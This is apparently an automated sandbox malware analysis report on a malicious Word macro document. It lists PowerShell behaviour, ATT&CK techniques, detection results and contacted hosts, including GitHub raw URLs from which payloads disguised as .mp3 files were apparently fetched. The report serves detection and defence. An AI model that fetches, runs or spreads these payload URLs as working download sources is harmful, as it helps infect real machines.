Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1180Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000002.00000002.435883601.000000000033B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsModify Registry1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting12LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RfORrHIRNe.doc49%VirustotalBrowse
RfORrHIRNe.doc100%AviraHEUR/Macro.Agent
RfORrHIRNe.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP100%AviraHEUR/Macro.Agent
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://github.co0%VirustotalBrowse
http://github.co0%Avira URL Cloudsafe
https://render.githubusercontent.com0%VirustotalBrowse
https://render.githubusercontent.com0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp30%VirustotalBrowse
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp30%Avira URL Cloudsafe
https://raw.githubuserco0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://notebooks.githubusercontent.com0%Avira URL Cloudsafe
https://raw.githubusercontent.com0%Avira URL Cloudsafe
https://viewscreen.githubusercontent.com0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
https://github.c0%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.4
truefalse
    		high
    raw.githubusercontent.com
    		185.199.108.133
    		truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/ssbb36/stv/raw/main/5.mp3false
      		high
      http://github.com/ssbb36/stv/raw/main/5.mp3false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://github.copowershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.windows.com/pctv.powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpfalse
          		high
          http://investor.msn.compowershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpfalse
            		high
            http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpfalse
              		high
              https://render.githubusercontent.compowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/ssbb36/stv/rapowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                		high
                http://crl.entrust.net/server1.crl0powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                  		high
                  http://github.com/ssbb36/stv/rawpowershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                    		high
                    http://ocsp.entrust.net03powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.compowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                      		high
                      https://github.com/ssbb36/stv/raw/main/1.mp3PEpowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://github.com/ssbb36/stv/raw/main/4.mp3PEpowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                          		high
                          http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://github.com/ssbb36/stv/raw/main/2.mp3powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                            		high
                            https://github.com/ssbb3powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oepowershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpfalse
                                		high
                                http://github.com/ssbb36/stv/raw/main/3.mp3powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                  		high
                                  https://raw.githubusercopowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpfalse
                                    		high
                                    http://github.compowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                                      		high
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.icra.org/vocabulary/.powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://notebooks.githubusercontent.compowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmpfalse
                                        		high
                                        http://github.com/ssbb36/stv/raw/main/2.mp3PEpowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                                          		high
                                          https://raw.githubusercontent.compowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://github.com/ssbb36powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmpfalse
                                            		high
                                            http://github.com/ssbb36/stv/raw/main/4.mp3powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                              		high
                                              http://investor.msn.com/powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpfalse
                                                		high
                                                https://viewscreen.githubusercontent.compowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://github.com/ssbb36/stv/raw/main/5.mp3PEpowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.%s.comPApowershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		low
                                                  https://github.cpowershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://github.com/ssbb36/stv/raw/main/3.mp3PEpowershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://ocsp.entrust.net0Dpowershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://github.com/ssbb36/stv/raw/main/1.mp3powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://secure.comodo.com/CPS0powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmpfalse
                                                        		high
                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          185.199.108.133
                                                          		raw.githubusercontent.comNetherlands
                                                          		54113FASTLYUSfalse
                                                          140.82.121.3
                                                          		unknownUnited States
                                                          		36459GITHUBUSfalse
                                                          140.82.121.4
                                                          		github.comUnited States
                                                          		36459GITHUBUSfalse

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:515215
                                                          Start date:04.11.2021
                                                          Start time:02:09:32
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 6m 16s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:RfORrHIRNe.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Run name:Without Instrumentation
                                                          Number of analysed new started processes analysed:5
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal92.expl.winDOC@3/10@3/3
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 2
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                          • Execution Graph export aborted for target powershell.exe, PID 2784 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          02:10:27API Interceptor43x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          185.199.108.133RfORrHIRNe.docGet hashmaliciousBrowse
                                                            RfORrHIRNe.docGet hashmaliciousBrowse
                                                              8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                Statement_125858.docGet hashmaliciousBrowse
                                                                  MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                    zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                      ip ddos.exeGet hashmaliciousBrowse
                                                                        Ambrosial.exeGet hashmaliciousBrowse
                                                                          hwid.exeGet hashmaliciousBrowse
                                                                            fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                              AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                  t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                    gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                      YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                        KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                          6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                            Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                              7D4B1B72B1318CB933E0D6420813499581064F57A713B.exeGet hashmaliciousBrowse
                                                                                                j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                  140.82.121.3RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • github.com/ssbb36/stv/raw/main/5.mp3

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  github.comRfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  PO-011121.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  hwid.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Invoice Overdue_C0809-H03.xls.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  1S3cLXtFN2.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  RdCWJ3MAGz.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  INVOICE.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  plf5v18Xds.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  raw.githubusercontent.comRfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Statement_125858.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.110.133
                                                                                                  MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  ip ddos.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Ambrosial.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  hwid.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.110.133
                                                                                                  Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.110.133
                                                                                                  pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.110.133
                                                                                                  gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  GITHUBUSRfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  PO-011121.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  hwid.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Invoice Overdue_C0809-H03.xls.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  RdCWJ3MAGz.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  INVOICE.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.3
                                                                                                  gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                  • 140.82.121.4
                                                                                                  FASTLYUSRfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  RfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  NtxIAL7Vqi.dllGet hashmaliciousBrowse
                                                                                                  • 151.101.1.108
                                                                                                  SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dllGet hashmaliciousBrowse
                                                                                                  • 151.101.1.44
                                                                                                  #Ud83d#Udd0a VM 9193407283.wav.htmlGet hashmaliciousBrowse
                                                                                                  • 151.101.1.229
                                                                                                  8p0O2OJPcE.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  DELAY NOTICE - WAN HAI 261 S321 - SO 3110.exeGet hashmaliciousBrowse
                                                                                                  • 151.101.1.211
                                                                                                  Order_10112021 40200 p.m..htmlGet hashmaliciousBrowse
                                                                                                  • 151.101.1.229
                                                                                                  Oh49Bck5BV.exeGet hashmaliciousBrowse
                                                                                                  • 151.101.194.199
                                                                                                  Documents_photos.htmlGet hashmaliciousBrowse
                                                                                                  • 151.101.112.193
                                                                                                  nEVkwpjXlu.apkGet hashmaliciousBrowse
                                                                                                  • 151.101.2.137
                                                                                                  SOA OCT-NOV 2021.exeGet hashmaliciousBrowse
                                                                                                  • 151.101.1.211
                                                                                                  Statement_125858.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  cs.exeGet hashmaliciousBrowse
                                                                                                  • 151.101.1.164
                                                                                                  mipselGet hashmaliciousBrowse
                                                                                                  • 167.82.53.249
                                                                                                  6575DHL_6757.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.153
                                                                                                  PO-011121.jarGet hashmaliciousBrowse
                                                                                                  • 199.232.192.209
                                                                                                  iedRCXBuxs.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.110.133
                                                                                                  MZ7EuvQ9IB.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  zvUd7VPOfS.exeGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  05af1f5ca1b87cc9cc9b25185115607dRfORrHIRNe.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  IMPORTS INVOICE.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Purchase Order NO_0184930.docGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  BL_DOCUMENT.xlsxGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Order-135078.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
